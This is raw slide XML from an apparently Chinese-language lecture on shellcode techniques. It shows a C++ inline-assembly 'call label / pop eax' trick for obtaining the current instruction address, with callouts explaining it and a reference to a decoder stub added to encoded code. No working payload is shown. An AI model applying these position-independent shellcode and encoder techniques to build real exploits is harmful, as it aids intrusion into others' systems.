                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> main(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>int</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>argc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>, char </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>const</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> *</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>argv</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>[])</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>{</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>    unsigned   </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>int</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>   temp;    </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>    __</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>asm</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>{</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>        call </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>lable</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>       </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>lable</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>        pop </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>mov</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>temp,eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>    }</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>    </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>cout</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> &lt;&lt;temp &lt;&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>endl</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>    return 0;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="线形标注 2 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6213351" y="2320181"/>
            <a:ext cx="6336704" cy="1512168"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout2">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>会执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>push EIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的值又是下一条指令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pop EAX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="线形标注 2 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6215330" y="4542665"/>
            <a:ext cx="5472608" cy="1512168"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout2">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18750"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val 18750"/>
              <a:gd name="adj4" fmla="val -16667"/>
              <a:gd name="adj5" fmla="val 24008"/>
              <a:gd name="adj6" fmla="val -51354"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>会将栈顶</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>（自身指令地址）出栈，保存到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EAX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>中</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3889293177"/>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 grpId="0" animBg="1"/>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0CBA4C38-133D-4615-AA5C-4AB9BDE3F67A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2540943" y="303957"/>
            <a:ext cx="8045792" cy="504056"/>
            <a:chOff x="3837808" y="633225"/>
            <a:chExt cx="5445882" cy="678844"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="10" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97B97828-018C-46B1-9C84-9C38BF0C2B0C}"/>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2ECAD2EB-634C-448E-A94C-5E5E4A28D7DF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3837808" y="633225"/>
              <a:ext cx="5445882" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>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解码程序加上之前编码的</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形成最终完整的</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endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="表格 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1849786096"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2252911" y="1096045"/>
          <a:ext cx="8562762" cy="5654214"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="8562762">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="5654214">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>int</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> main(){</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__</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>asm</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>  {</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1898" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>     call </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>lable</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>; </a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFF00"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>     </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>lable</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>: pop </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
